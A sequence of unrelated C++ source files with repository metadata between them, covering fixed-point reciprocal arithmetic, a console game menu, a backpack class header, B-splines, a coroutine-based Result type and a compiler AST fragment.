assert(a[0] != 0 && "Divide by zero");
return DoWithDivZero(A);
}
reciprocal_init_value<MAX_LEN>(a[1], A.data());
FixPointData<UINT_T, MAX_LEN> AA = FixPointData<UINT_T, MAX_LEN>(MAX_LEN);
int n = 0;
int lz_count_limit = MAX_LEN * 8 * (int)sizeof(UINT_T) - 1;
int lz_count = 0;
int a_size = 2;
for(n = 0; n < lz_count_limit; n++) {
AA = A;
FloatPoint_multi_eq(AA, a, a_size);
if(AA[0] == 0) {
UINT8 t1 = 1;
for(int i = MAX_LEN - 1; i > 0; i--) {
t1 = _addcarry_base(t1, ~(AA[i]), 0, AA[i]);
}
lz_count = lzcnt(AA);
// DEBUG_COUT(lz_count - zerocount);
FloatPoint_multi_eq(AA, A, a_size);
add_eq(A, AA);
} else // if(AA[0] == 1)
{
AA[0] = 0;
lz_count = lzcnt(AA);
// DEBUG_COUT(lz_count - lz_count_limit);
FloatPoint_multi_eq(AA, A, a_size);
minus_eq(A, AA);
}
if(lz_count >= lz_count_limit) {
break;
}
if(a_size < MAX_LEN) {
a_size *= 2;
}
}
// printf("FixPoint_reciprocal iter times is %d\n", n);
return n;
}
/*
A = 1 / a
返回A = 1/a
A(n+1) = A(n) + A(n)(1 - a*A(n))
*/
template <typename UINT_T, int MAX_LEN>
int KaratsubaReciprocal(const FixPointData<UINT_T, MAX_LEN>& a, FixPointData<UINT_T, MAX_LEN>& A)
{
if(a[0] == 0) {
assert(a[0] != 0 && "Divide by zero");
return DoWithDivZero(A);
}
reciprocal_init_value<MAX_LEN>(a[1], A.data());
FixPointData<UINT_T, MAX_LEN> AA = FixPointData<UINT_T, MAX_LEN>(MAX_LEN);
int n;
int lz_count_limit = MAX_LEN * 8 * (int)sizeof(UINT_T) - 1;
int lz_count = 0;
for(n = 0; n < lz_count_limit; n++) {
AA = A;
KaratsubaMult_eq<UINT_T, MAX_LEN>(AA, a);
// multi_eq<UINT_T, MAX_LEN>(AA, a);
if(AA[0] == 0) {
UINT8 t1 = 1;
for(int i = MAX_LEN - 1; i > 0; i--) {
t1 = _addcarry_base(t1, ~(AA[i]), 0, AA[i]);
}
lz_count = lzcnt(AA);
KaratsubaMult_eq<UINT_T, MAX_LEN>(AA, A);
// multi_eq<UINT_T, MAX_LEN>(AA, A);
add_eq(A, AA);
} else // if(AA[0] == 1)
{
AA[0] = 0;
lz_count = lzcnt(AA);
KaratsubaMult_eq<UINT_T, MAX_LEN>(AA, A);
// multi_eq<UINT_T, MAX_LEN>(AA, A);
minus_eq(A, AA);
}
// println(A,"A");
// println(AA,"AA");
if(lz_count >= lz_count_limit) {
break;
}
}
// if(n > 9)
// {
// DEBUG_COUT(ToDouble(a));
// DEBUG_COUT(lz_count - zerocount);
// printf("FixPoint_reciprocal iter times is %d\n", n);
// }
// printf("FixPoint_reciprocal iter times is %d\n", n);
return n;
}
template <typename UINT_T, int MAX_LEN> int FloatPointReciprocal2(const UINT_T* a, UINT_T* A)
{
UINT_T B[MAX_LEN] = { 0 };
MultBase::Reciprocal<UINT_T, MAX_LEN>(a, A);
int n;
int lz_count_limit = MAX_LEN * 8 * (int)sizeof(UINT_T) - 2;
int lz_count = 0;
for(n = 1; n < lz_count_limit; n++) {
memcpy(B, A, MAX_LEN * sizeof(UINT_T));
MultBase::Mult_eq<UINT_T, MAX_LEN>(B, a);
if(B[0] == 0) {
UINT8 t1 = 1;
for(int i = MAX_LEN - 1; i > 0; i--) {
t1 = _addcarry_base(t1, ~(B[i]), 0, B[i]);
}
lz_count = MultBase::lzcnt<UINT_T, MAX_LEN>(B);
MultBase::Mult_eq<UINT_T, MAX_LEN>(B, A);
MultBase::add_eq<UINT_T, MAX_LEN>(A, B);
} else {
B[0] = 0;
lz_count = MultBase::lzcnt<UINT_T, MAX_LEN>(B);
MultBase::Mult_eq<UINT_T, MAX_LEN>(B, A);
MultBase::minus_eq<UINT_T, MAX_LEN>(A, B);
}
// DEBUG_COUT(n);
if(lz_count >= lz_count_limit) {
break;
}
}
// DEBUG_COUT(n);
return n;
}
/*
A = 1 / a
返回A = 1/a
A(n+1) = A(n) + A(n)(1 - a*A(n))
*/
template <typename UINT_T, int MAX_LEN>
int Base_Reciprocal(const FixPointData<UINT_T, MAX_LEN>& a, FixPointData<UINT_T, MAX_LEN>& A)
{
if(a[0] == 0) {
assert(a[0] != 0 && "Divide by zero");
return DoWithDivZero(A);
}
reciprocal_init_value<MAX_LEN>(a[1], A.data());
FixPointData<UINT_T, MAX_LEN> AA = FixPointData<UINT_T, MAX_LEN>(MAX_LEN);
int n;
int lz_count_limit = MAX_LEN * 8 * (int)sizeof(UINT_T) - 1;
int lz_count = 0;
for(n = 0; n < lz_count_limit; n++) {
AA = A;
multi_eq<UINT_T, MAX_LEN>(AA, a);
if(AA[0] == 0) {
UINT8 t1 = 1;
for(int i = MAX_LEN - 1; i > 0; i--) {
t1 = _addcarry_base(t1, ~(AA[i]), 0, AA[i]);
}
lz_count = lzcnt(AA);
multi_eq<UINT_T, MAX_LEN>(AA, A);
add_eq(A, AA);
} else // if(AA[0] == 1)
{
AA[0] = 0;
lz_count = lzcnt(AA);
multi_eq<UINT_T, MAX_LEN>(AA, A);
minus_eq(A, AA);
}
if(lz_count >= lz_count_limit) {
break;
}
}
return n;
}
// template <typename UINT_T, int MAX_LEN>
// int reciprocal(const FixPointData<UINT_T, MAX_LEN>& a, FixPointData<UINT_T, MAX_LEN>& A, size_t max_iter)
//{
// int MaxLen = a.size();
// assert(a[0] != 0);
// assert(a.size() == A.size());
// if(a[0] == 0)
// {
// std::cout << "FixPoint::reciprocal LINE" << __LINE__ << ":" << a[0] << std::endl;
// for(int i = 0; i < (int)A.size(); ++i)
// {
// A[i] = ~((UINT_T)0);
// }
// return -1;
// }
// for(int i = 0; i < (int)A.size(); ++i)
// {
// A[i] = 0;
// }
// reciprocal_init_value(a[1], A[1]);
// FixPointData<UINT_T, MAX_LEN> AA = FixPointData<UINT_T, MAX_LEN>(MaxLen);
// int n;
// int zerocount = MaxLen * 8 * (int)sizeof(UINT_T) - 2;
// for(n = 0; n < (int)max_iter; n++)
// {
// // A(n+1) = A(n) + A(n)(1 - a*A(n))
// AA = A;
// multi_eq(AA, a);
// UINT8 t1 = 1;
// for(int i = MaxLen - 1; i > 0; i--)
// {
// t1 = _addcarry_base(t1, ~(AA[i]), 0, AA[i]);
// }
// t1 = _addcarry_base(t1, ~(AA[0]), 1, AA[0]);
// if(t1 == 0)
// {
// UINT8 t2 = 1;
// for(int i = MaxLen - 1; i >= 0; i--)
// {
// t2 = _addcarry_base(0, t2, ~(AA[i]), AA[i]);
// }
// }
// // if(n == 0)
// // {
// // DEBUG_COUT(ToDouble(AA)); // 1 - a*A
// // DEBUG_COUT(ToDouble(a));
// // DEBUG_COUT(ToDouble(A));
// // }
// int lz_count = lzcnt(AA);
// multi_eq(AA, A);
// add_eq(A, AA);
// if(lz_count >= zerocount)
// {
// break;
// }
// }
// // printf("FixPoint_reciprocal iter times is %d\n", n);
// return n;
//}
// template <typename UINT_T, int MAX_LEN>
// int reciprocal(const FixPointData<UINT_T, MAX_LEN>& a, FixPointData<UINT_T, MAX_LEN>& A, size_t max_iter)
//{
// int MaxLen = a.size();
// assert(a[0] != 0);
// assert(a.size() == A.size());
// if(a[0] == 0)
// {
// std::cout << "FixPoint::reciprocal LINE" << __LINE__ << ":" << a[0] << std::endl;
// for(int i = 0; i < (int)A.size(); ++i)
// {
// A[i] = 0xFFFFFFFF;
// }
// return 0;
// }
// for(int i = 0; i < (int)A.size(); ++i)
// {
// A[i] = 0;
// }
// reciprocal_init_value(a[1], A[1]);
// // std::cout << std::endl << "L434 : " << t1 << std::endl;
// // std::cout << std::endl << "L436 : " << std::hex << A[1] << std::endl;
// FixPointData<UINT_T, MAX_LEN> B = FixPointData<UINT_T, MAX_LEN>(MaxLen);
// FixPointData<UINT_T, MAX_LEN> AA = B;
// FixPointData<UINT_T, MAX_LEN> two = B;
// two[0] = 2;
// int n;
// int zerocount = MaxLen * 8 * (int)sizeof(UINT_T) - 2;
// for(n = 0; n < (int)max_iter; n++)
// {
// // A(n+1) = A(n)*(2 - a*A(n))
//
// AA = A;
// // DEBUG_COUT(A[0] + A[1] / pow(2.0, 64));
// multi(a, A, B);
// // DEBUG_COUT(B[0] + B[1] / pow(2.0, 64));
// minused_eq(two, B);
// // DEBUG_COUT(B[0] + B[1] / pow(2.0, 64));
// multi_eq(A, B);
// // DEBUG_COUT(A[0] + A[1] / pow(2.0, 64));
// minused_eq(A, AA);
// // DEBUG_COUT(AA[0] + AA[1] / pow(2.0, 64));
// if(lzcnt(AA) >= zerocount)
// {
// break;
// }
// }
// printf("FixPoint_reciprocal iter times is %d\n", n);
// return n;
//}
} // namespace FixPointOperator
#endif // FixPointReciprocal_H
|
11927cd74995c7eeeadaa2b1deb86765a76ed7f8
|
3fbf7bd76a502c13b29d54cd19d8467a7d013899
|
/mmoserver/src/Registry.cpp
|
5d561f21cf60fadebfa0af2c2a1ae0f44942bab1
|
[] |
no_license
|
kspine/mmoserver-1
|
d96605e357f157c29c04d2efdc9185f696b18dc7
|
c77a4a2635758d2a6f29ab331b136e905107dc27
|
refs/heads/master
| 2021-05-06T08:01:26.860134
| 2014-11-07T01:44:46
| 2014-11-07T01:44:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 235
|
cpp
|
Registry.cpp
|
/*
* Registry.cpp
*
* Created on: 11 Jun 2014
* Author: dilan
*/
#include "Registry.h"
Registry::Registry() {
// TODO Auto-generated constructor stub
}
Registry::~Registry() {
// TODO Auto-generated destructor stub
}
|
c09fb99b9f626c1b3e9b93931aa8cb18a7ab26b2
|
666a5d909f19701c6fc5ddca3919b06829adfcce
|
/AppManager.cpp
|
dc2a65cabd99822401ca097dbefe527a7bd26aa5
|
[] |
no_license
|
joydeveloper/CartoonLife
|
dbfd52392eeb78814308df8a095706e744477d4b
|
f87148f3d2a4ababaefcf9e69f7bc6d57f2ff64d
|
refs/heads/master
| 2021-01-24T08:18:34.580256
| 2017-06-05T08:12:36
| 2017-06-05T08:12:36
| 93,379,450
| 0
| 0
| null | null | null | null |
WINDOWS-1251
|
C++
| false
| false
| 2,965
|
cpp
|
AppManager.cpp
|
#include "stdafx.h"
#include "AppManager.h"
int AppManager::SubSystemOptionGet(int value)
{
return options.apptype;
}
void AppManager::SubSystemOptionSet(Data::AppType at)
{
options.apptype = at;
}
void AppManager::ShowTitle()
{
BaseInterface::ConsoleInterface::ShowMessage(" _____ _ _ _ __ ");
BaseInterface::ConsoleInterface::ShowMessage(" / ____| | | | (_)/ _| ");
BaseInterface::ConsoleInterface::ShowMessage(" | | __ _ _ __| |_ ___ ___ _ __ | |_| |_ ___ ");
BaseInterface::ConsoleInterface::ShowMessage(" | | / _` | '__| __/ _ \ / _ \| '_ \ | | | _/ _ |");
BaseInterface::ConsoleInterface::ShowMessage(" | |___| (_| | | | || (_) | (_) | | | | | | | || __/");
BaseInterface::ConsoleInterface::ShowMessage(" \_____\__,_|_| \__\___/ \___/|_| |_| |_|_|_| \___|");
switch (options.apptype)
{
case 0:BaseInterface::ConsoleInterface();
AppView = BaseInterface::InterfaceType(0);
AppView.AddItem(BaseInterface::Menu(BaseInterface::Menu::selectgame));
AppView.AddItem(BaseInterface::Menu(BaseInterface::Menu::load));
AppView.AddItem(BaseInterface::Menu(BaseInterface::Menu::options));
break;
case 1:BaseInterface::WindowInterface();
}
On = true;
}
int AppManager::SelectMenu(char select, int lev)
{
int _select=lev;
if (lev == 0)
switch (select)
{
case '1':AppView.ConsoleItems[0].Show();
_select = 1;
break;
case '2':AppView.ConsoleItems[1].Show();
_select = 2;
break;
case '3':AppView.ConsoleItems[2].Show();
_select = 2;
break;
default:
ShowTitle();
_select = 0;
break;
}
if (lev == 1)
switch (select)
{
case '1':BaseInterface::ConsoleInterface::ShowMessage("Спринт");
GameManager(SprintMode().StartGame(GameMode, options,playerorder));
this->On = false;
return 0;
break;
case '2':BaseInterface::ConsoleInterface::ShowMessage("Охота за сокровищами");
this->On = false;
return 0;
break;
default:
ShowTitle();
return 0;
break;
}
else if (lev == 2)
{
switch (select)
{
case '1':BaseInterface::ConsoleInterface::ShowMessage("Загрузить....");
return 0;
break;
default:
ShowTitle();
return 0;
break;
}
}
else if (lev == 3)
{
switch (select)
{
case '1':BaseInterface::ConsoleInterface::ShowMessage("Опция1");
return 0;
break;
case '2':BaseInterface::ConsoleInterface::ShowMessage("Опция2");
return 0;
break;
default:
ShowTitle();
return 0;
break;
}
}
return _select;
}
char AppManager::GetUserInput()
{
return 0;
}
int AppManager::CreateGame(int GameType)
{
return 0;
}
int AppManager::LoadData()
{
return 0;
}
std::string AppManager::GetUserOptions(int Coption)
{
return "";
}
void AppManager::Exit()
{
}
|
268145e8ae16eab0ebd03cb469269f20d221c52c
|
233766c3228b98ae42371ab4a70d559429ad74f5
|
/lab25/src/Backpack.h
|
072e94003edabd669bdc9fc708d78a05009a7a3b
|
[] |
no_license
|
Vlad-Makarenko/Programing-repo
|
5d4e9769ac0257079d21885489c7bb183661a075
|
8c1d1bbee825fde2da571f418f813948a090a4cc
|
refs/heads/main
| 2023-05-09T12:12:20.583174
| 2021-06-01T21:19:15
| 2021-06-01T21:19:15
| 303,690,931
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,950
|
h
|
Backpack.h
|
//
// Created by Vlad on 20.04.2021.
//
#ifndef LAB23_BACKPACK_H
#define LAB23_BACKPACK_H
#include <string>
#include <sstream>
#include <cstring>
#include <iostream>
#include <fstream>
#include <regex>
using std::string;
using std::cin;
using std::cout;
using std::endl;
using std::stringstream;
using std::ifstream;
using std::ofstream;
using std::ostream;
using std::istream;
using std::regex_match;
using std::regex;
using std::stoi;
enum Purpose{
URBAN,
TACTICAL,
TOURIST
};
class Firm{
string Name;
string Country;
public:
Firm();
Firm(string Name, string Country);
Firm(const Firm ©);
virtual ~Firm();
string getName() const;
string getCountry() const;
void setName(const string &name);
void setCountry(const string &country);
void Print();
};
class Backpack{
bool laptop_department; // 1 - yes; 0 - no.
string color;
int volume;
Firm firm;
Purpose enumPurpose;
public:
Backpack();
Backpack(int laptop_department, string color, int volume, const Firm& firm, enum Purpose purpose);
Backpack(const Backpack ©);
virtual ~Backpack();
int getlaptop_department() const;
string getcolor() const;
int getvolume() const;
Firm getfirm() const;
Purpose getpurpose() const;
void setlaptop_department(const int laptop_department);
void setcolor(const string color);
void setvolume( const int volume);
void setfirm(Firm *firm1);
void setpurpose(const Purpose purpose);
void Print();
string toString() const;
Backpack& SplitLineToObject(const string &object) const;
Backpack& operator=(const Backpack& backpack) ;
};
bool operator==(const Backpack& A, const Backpack& B);
bool operator!=(const Backpack& A, const Backpack& B);
ostream & operator<<(ostream &out ,const Backpack& backpack);
istream & operator>>(istream &in, Backpack& backpack);
void PrintForm();
#endif //LAB23_BACKPACK_H
|
bfb4c241d038fc85150c43f9c2b4d871075809d2
|
1027c6b4501df19d5fdd543d510860c8e7ef1544
|
/source/glannotations/source/Utility/BSpline2D.cpp
|
be5abd4b3fd605af5fa5e87ca75da456d33e0fb0
|
[
"MIT"
] |
permissive
|
dgimb89/glannotations
|
ee13a9fd0d40bb0fb14a1e4b312b2ddf02a7a6db
|
df687dbae1906cdb08c7b10cb006c025c4ba6406
|
refs/heads/master
| 2020-06-14T21:51:35.092964
| 2016-12-02T15:57:35
| 2016-12-02T15:57:35
| 75,408,576
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,525
|
cpp
|
BSpline2D.cpp
|
#include <glannotations/Utility/BSpline2D.h>
#include <glm/gtx/vector_angle.hpp>
#include <glm/gtx/rotate_vector.hpp>
#include <iostream>
#include <math.h>
glannotations::BSpline2D::BSpline2D(std::vector<glm::vec2> ctrlPoints, std::vector<float> knotValues)
: BSpline(knotValues) {
assert(ctrlPoints.size() > 0);
setControlPoints(ctrlPoints);
calculateSplineDegree();
calculateArcLengths();
}
glannotations::BSpline2D::BSpline2D(std::vector<glm::vec2> ctrlPoints, unsigned short degree)
: BSpline(degree) {
assert(ctrlPoints.size() > 0);
setControlPoints(ctrlPoints);
calculateUniformKnotValues();
calculateArcLengths();
}
void glannotations::BSpline2D::setControlPoints(std::vector<glm::vec2> ctrlPoints) {
assert(ctrlPoints.size() > 0);
setDirty(true);
m_ctrlPoints.clear();
for (size_t i = 0; i < ctrlPoints.size(); i++) {
m_ctrlPoints.push_back(glm::vec3(ctrlPoints[i].x, ctrlPoints[i].y, 0.f));
}
calculateArcLengths();
}
glm::vec4 glannotations::BSpline2D::getBoundingRect() {
//todo: maybe there is a more efficient way
float maxX = std::numeric_limits<float>::min();
float maxY = std::numeric_limits<float>::min();
float minX = std::numeric_limits<float>::max();
float minY = std::numeric_limits<float>::max();
for (const auto & ctrlPoint : m_ctrlPoints) {
maxX = std::fmaxf(maxX, ctrlPoint.x);
maxY = std::fmaxf(maxY, ctrlPoint.y);
minX = std::fminf(minX, ctrlPoint.x);
minY = std::fminf(minY, ctrlPoint.y);
}
return glm::vec4(minX, minY, maxX, maxY);
}
|
07e77a81f94a073c42845a6bc4c444131804835c
|
fb51c1a4907a3f727fd144d06e0d74b0e4917747
|
/Algo/Chaos/Thanos sort/main.cpp
|
3b7b5f64d6ecaa03ba954e93f2e2645e0c9efafe
|
[] |
no_license
|
lawrence910426/practice
|
181aab797d613b9b847d86744b4bec5d0aeeb42f
|
890a41b910805de6eec70882a4dfdb261d13e601
|
refs/heads/master
| 2023-03-17T04:09:44.291078
| 2022-03-11T16:23:24
| 2022-03-11T16:23:24
| 186,070,762
| 3
| 1
| null | 2023-03-06T10:44:16
| 2019-05-11T00:39:00
|
C++
|
UTF-8
|
C++
| false
| false
| 452
|
cpp
|
main.cpp
|
#include <iostream>
using namespace std;
int data[1000];
int ans(int l ,int r) {
if(r - l == 1) return 1;
bool AC = true;
for(int i = l;i < r - 1;i++)
AC &= data[i] <= data[i + 1];
if(AC) return r - l;
else {
int left = ans(l ,(l + r) / 2);
int right = ans((l + r) / 2 ,r);
return (left > right ? left : right);
}
}
int main() {
int n ,i;
while(cin >> n) {
for(i = 0;i < n;i++) cin >> data[i];
cout << ans(0 ,n) << endl;
}
}
|
9bf1caa1ac95d623ba91bfbc52c4132fd3781a21
|
b6523b473b0162fab07a1284d22bb7e7a9f6d516
|
/coroAsio/Result.h
|
6570b939fd3dac1f7f3b5bafe33b1a3839001069
|
[] |
no_license
|
ladnir/coroAsio
|
4feb9eb2c617192adedde4bee0f6dd4f4a0de124
|
2263d7b8dd3741ffccac755400360bf7b404d251
|
refs/heads/master
| 2021-05-17T17:46:04.805700
| 2020-03-31T19:20:31
| 2020-03-31T19:20:31
| 250,902,700
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 14,879
|
h
|
Result.h
|
#pragma once
#include <experimental/coroutine>
#include <variant>
#include <optional>
#include <system_error>
#include <tuple>
#include <iostream>
#include <string>
#include "cppcoro/task.hpp"
#define INLINE_VARIANT
#define VERBOSE(x)
//#define VERBOSE(x) x
namespace ncoro
{
using u64 = unsigned long long;
using u32 = unsigned int;
using u8 = unsigned char;
using i64 = long long;
using i32 = int;
using i8 = char;
enum class Errc
{
success = 0,
uncaught_exception
//CloseChannel = 1 // error indicating we should call the close handler.
};
}
namespace std {
template <>
struct is_error_code_enum<ncoro::Errc> : true_type {};
}
namespace ncoro
{
using error_code = std::error_code;
error_code make_error_code(Errc e);
class BadResultAccess
: public std::exception
{
public:
BadResultAccess(char const* const msg)
: std::exception(msg)
{
}
};
namespace stde = std::experimental;
namespace details
{
template<typename T, typename Error, typename ExceptionHandler>
class Result
{
public:
using value_type = std::remove_cvref_t<T>;
using error_type = std::remove_cvref_t<Error>;
using exception_handler = std::remove_cvref_t<ExceptionHandler>;
#ifdef INLINE_VARIANT
Result(const typename std::enable_if_t<std::is_copy_constructible<value_type>::value, value_type>& t)
:mVar(t)
{
VERBOSE(std::cout << "constructed Result 1 at " << (u64)this << " " << *this << std::endl);
}
Result(typename std::enable_if_t<std::is_move_constructible<value_type>::value, value_type>&& t)
:mVar(std::forward<value_type>(t))
{
VERBOSE(std::cout << "constructed Result 2 at " << (u64)this << " " << *this << std::endl);
}
Result(const typename std::enable_if_t<std::is_copy_constructible<error_type>::value, error_type>& e)
:mVar(e)
{
VERBOSE(std::cout << "constructed Result 3 at " << (u64)this << " " << *this << std::endl);
}
Result(typename std::enable_if_t<std::is_move_constructible<error_type>::value, error_type>&& e)
:mVar(std::forward<error_type>(e))
{
VERBOSE(std::cout << "constructed Result 4 at " << (u64)this << " " << *this << std::endl);
}
Result(Result&& r)
{
var() = r.mVar;
VERBOSE(std::cout << "constructed Result 5 at " << (u64)this << " " << *this << std::endl);
}
std::variant<value_type, error_type>& var() {
return mVar;
};
const std::variant<value_type, error_type>& var() const {
return mVar;
};
#else
~Result()
{
VERBOSE(std::cout << "~Result() " << (u64)this << std::endl);
if (coroutine_handle)
coroutine_handle.destroy();
}
Result(const typename std::enable_if_t<std::is_copy_constructible<value_type>::value, value_type>& t)
{
*this = [&]()-> Result {co_return t; }();
VERBOSE(std::cout << "constructed Result 1 at " << (u64)this << " " << *this << std::endl);
}
Result(typename std::enable_if_t<std::is_move_constructible<value_type>::value, value_type>&& t)
{
*this = [&]()-> Result {co_return t; }();
VERBOSE(std::cout << "constructed Result 2 at " << (u64)this << " " << *this << std::endl);
}
Result(const typename std::enable_if_t<std::is_copy_constructible<error_type>::value, error_type>& e)
{
*this = [&]() -> Result { co_return e; }();
VERBOSE(std::cout << "constructed Result 3 at " << (u64)this << " " << *this << std::endl);
}
Result(typename std::enable_if_t<std::is_move_constructible<error_type>::value, error_type>&& e)
{
*this = [&]()-> Result {co_return e; }();
VERBOSE(std::cout << "constructed Result 4 at " << (u64)this << " " << *this << std::endl);
}
Result(Result&& r)
{
var() = r;
r.coroutine_handle = {};
VERBOSE(std::cout << "constructed Result 5 at " << (u64)this << " " << *this << std::endl);
}
std::variant<value_type, error_type>& var() {
return coroutine_handle.promise().mVar;
};
const std::variant<value_type, error_type>& var() const {
return coroutine_handle.promise().mVar;
};
#endif
Result& operator=(const value_type& v)
{
var() = v;
VERBOSE(std::cout << "assign Result 1 at " << (u64)this << " " << *this << std::endl);
return *this;
}
Result& operator=(value_type&& v)
{
var() = std::move(v);
VERBOSE(std::cout << "assign Result 2 at " << (u64)this << " " << *this << std::endl);
return *this;
}
Result& operator=(Result&& r)
{
var() = std::move(r.var());
return *this;
}
Result& operator=(Result const& r)
{
var() = r.var();
return *this;
}
bool hasValue() const
{
return std::holds_alternative<value_type>(var());
}
bool hasError() const
{
return !hasValue();
}
operator bool() const
{
return hasError();
}
value_type& operator->()
{
return unwrap();
}
const value_type& operator->() const
{
return unwrap();
}
value_type& operator*()
{
return unwrap();
}
const value_type& operator*() const
{
return unwrap();
}
value_type& unwrap()
{
if (hasError())
exception_handler{}.throwErrorType(error());
return std::get<value_type>(var());
}
const value_type& unwrap() const
{
if (hasError())
exception_handler{}.throwErrorType(error());
return std::get<value_type>(var());
}
value_type& unwrapOr(value_type& alt)
{
if (hasError())
return alt;
return std::get<value_type>(var());
}
const value_type& unwrapOr(const value_type& alt) const
{
if (hasError())
return alt;
return std::get<value_type>(var());
}
error_type& error()
{
if (hasValue())
throw BadResultAccess("error() was called on a Result<T,E> which stores an value_type");
return std::get<error_type>(var());
}
const error_type& error() const
{
if (hasValue())
throw BadResultAccess("error() was called on a Result<T,E> which stores an value_type");
return std::get<error_type>(var());
}
struct promise_type;
template <class Promise>
struct result_awaiter {
~result_awaiter()
{
VERBOSE(std::cout << "~promise_type()" << std::endl);
}
using value_type = typename Promise::result_type::value_type;
using exception_handler = typename Promise::result_type::exception_handler;
Result<value_type, error_type, exception_handler>&& res;
result_awaiter(Result<value_type, error_type, exception_handler>&& r)
: res(std::move(r))
{
VERBOSE(std::cout << "result_awaiter::result_awaiter()" << std::endl);
}
value_type&& await_resume() noexcept {
VERBOSE(std::cout << "result_awaiter::await_resume()" << std::endl);
return std::move(res.unwrap());
}
bool await_ready() noexcept {
VERBOSE(std::cout << "result_awaiter::await_ready()" << std::endl);
return res.hasValue();
}
void await_suspend(std::experimental::coroutine_handle<promise_type> const& handle) noexcept {
VERBOSE(std::cout << "result_awaiter::await_suspend()" << std::endl);
handle.promise().var() = res.error();
}
};
struct promise_type
{
~promise_type()
{
VERBOSE(std::cout << "~promise_type()" << std::endl);
}
using result_type = Result;
stde::suspend_never initial_suspend() {
VERBOSE(std::cout << "promise_type::initial_suspend()" << std::endl);
return {};
}
#ifdef INLINE_VARIANT
stde::suspend_never final_suspend() noexcept {
VERBOSE(std::cout << "promise_type::final_suspend()" << std::endl);
return {};
}
#else
stde::suspend_always final_suspend() noexcept {
VERBOSE(std::cout << "promise_type::final_suspend()" << std::endl);
return {};
}
#endif
Result get_return_object()
{
VERBOSE(std::cout << "promise_type::get_return_object()" << std::endl);
return stde::coroutine_handle<promise_type>::from_promise(*this);
}
void return_value(value_type&& value) noexcept {
VERBOSE(std::cout << "result_promise::return_value(T&&)" << std::endl);
var() = std::move(value);
}
void return_value(value_type const& value) {
VERBOSE(std::cout << "result_promise::return_value(T const&)" << std::endl);
var() = value;
}
void return_value(std::error_code errc) noexcept {
VERBOSE(std::cout << "result_promise::return_value(E)" << std::endl);
var() = errc;
}
void unhandled_exception()
{
VERBOSE(std::cout << "promise_type::unhandled_exception()" << std::endl);
var() = ExceptionHandler{}.unhandled_exception();
}
template <class TT, class EX>
auto await_transform(Result<TT, error_type, EX>&& res) noexcept {
VERBOSE(std::cout << "result_promise::await_transform(Result<TT,E>&&)" << std::endl);
return result_awaiter<Result<TT, error_type, EX>::promise_type>(std::move(res));
}
#ifdef INLINE_VARIANT
std::variant<value_type, error_type>& var()
{
return mRes->mVar;
}
result_type* mRes;
#else
std::variant<value_type, error_type> mVar;
std::variant<value_type, error_type>& var()
{
return mVar;
}
#endif
};
using coro_handle = std::experimental::coroutine_handle<promise_type>;
#ifdef INLINE_VARIANT
std::variant<value_type, error_type> mVar;
#else
coro_handle coroutine_handle;
#endif
Result(coro_handle handle)
{
#ifdef INLINE_VARIANT
handle.promise().mRes = this;
#else
coroutine_handle = handle;
#endif
VERBOSE(std::cout << "constructed Result ** at " << (u64)this << " " << *this << std::endl);
}
};
template<typename T, typename E, typename EX>
std::ostream& operator<<(std::ostream& out, const Result<T, E, EX>& r)
{
if (r.hasValue())
out << "{" << r.unwrap() << "}";
else
out << "<" << r.error().message() << ">" << std::endl;
return out;
}
}
template<typename T, typename E>
struct RethrowExceptionHandler
{
std::variant<T, E> unhandled_exception()
{
throw;
}
void throwErrorType(E& e)
{
throw e;
}
};
template<typename T, typename E>
struct NothrowExceptionHandler;
template<typename T>
class NothrowExceptionHandler<T, std::error_code>
{
public:
std::variant<T, std::error_code> unhandled_exception()
{
try
{
throw;
}
catch (std::error_code e)
{
return e;
}
catch (...)
{
return Errc::uncaught_exception;
}
std::terminate();
}
void throwErrorType(std::error_code e)
{
throw e;
}
};
template<typename T>
class NothrowExceptionHandler<T, std::exception_ptr>
{
public:
std::variant<T, std::exception_ptr> unhandled_exception()
{
return std::current_exception();
}
void throwErrorType(std::exception_ptr e)
{
std::rethrow_exception(e);
}
};
template<typename T, typename E>
class NothrowExceptionHandler
{
public:
std::variant<T, E> unhandled_exception()
{
try {
throw;
}
catch (E & e)
{
return e;
}
catch (...)
{
return E{};
}
std::terminate();
}
void throwErrorType(E const& e)
{
throw e;
}
};
template<typename T, typename Error = std::error_code, typename ExceptionHandler = NothrowExceptionHandler<T, Error>>
using Result = details::Result<T, Error, ExceptionHandler>;
}
int tupleMain();
//int tupleMain2();
|
fadfcb699d7d9f2ee0c570a74b51604c83d86815
|
ee92057a8ebc91ba90d8055a9bece25d24211499
|
/codeforces/766div2/notsitting/notsitting.cpp
|
914cfd12a56e5771702d846997d5cfd374faa74f
|
[] |
no_license
|
KendrickAng/competitive-programming
|
ce0a4f44f592f295c2f8cd7e854139f18fb8853a
|
f9768a2020f801b8e4787cc853398b8258a0bf09
|
refs/heads/master
| 2022-05-29T07:21:32.607089
| 2022-04-24T16:35:14
| 2022-04-24T16:35:14
| 254,402,307
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 183
|
cpp
|
notsitting.cpp
|
#include <bits/stdc++.h>
using namespace std;
void solve() {
int rows, cols; cin >> rows >> cols;
}
int main() {
int t; cin >> t;
while (t--) {
solve();
}
}
|
2e06b842a6c42997f88947109f9626be2b6dd591
|
569ccc9399a56d8172a4b12fbd042eac29d84042
|
/src/ast/FunctionGroupImport.cpp
|
f4091e16b7fa148c852d0ad1f910cc8dba7f3388
|
[
"MIT",
"BSL-1.0"
] |
permissive
|
denisw/soyac
|
4c2dd735c74c9d0df6841f245a3ce81cceb54595
|
2531e16e8dfbfa966931b774f9d79af528d16ff9
|
refs/heads/master
| 2020-12-30T23:33:19.346245
| 2020-07-02T20:23:39
| 2020-07-02T20:23:39
| 36,035,646
| 1
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 676
|
cpp
|
FunctionGroupImport.cpp
|
/*
* soyac - Soya Programming Language compiler
* Copyright (c) 2009 Denis Washington <dwashington@gmx.net>
*
* This file is distributed under the terms of the MIT license.
* See LICENSE.txt for details.
*/
#include "FunctionGroupImport.hpp"
#include "UnknownType.hpp"
#include "Visitor.hpp"
namespace soyac {
namespace ast
{
void*
FunctionGroupImport::visit(Visitor* v)
{
return v->visitFunctionGroupImport(this);
}
FunctionGroupImport::overloads_iterator
FunctionGroupImport::overloads_begin() const
{
return mOverloads.begin();
}
FunctionGroupImport::overloads_iterator
